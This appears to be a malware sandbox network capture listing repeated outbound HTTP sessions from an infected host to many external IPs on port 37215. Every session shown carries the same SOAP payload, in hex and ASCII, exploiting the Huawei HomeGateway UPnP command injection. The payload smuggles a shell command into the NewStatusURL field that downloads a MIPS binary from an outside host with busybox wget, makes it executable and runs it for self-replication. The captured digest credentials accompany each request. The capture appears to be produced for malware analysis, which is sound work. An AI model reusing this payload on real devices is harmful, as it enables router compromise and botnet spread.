                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.233859841.164.176.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489419937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.234336841.124.100.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489419937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.2343030197.247.112.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489438057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.2354884157.127.218.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489468098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.2353158197.94.10.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489468098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.2359106197.225.204.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489516973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.233903641.245.46.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489738941 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.233811641.194.114.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489744902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.2359978198.57.84.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489839077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.2350654157.78.222.7837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489849091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
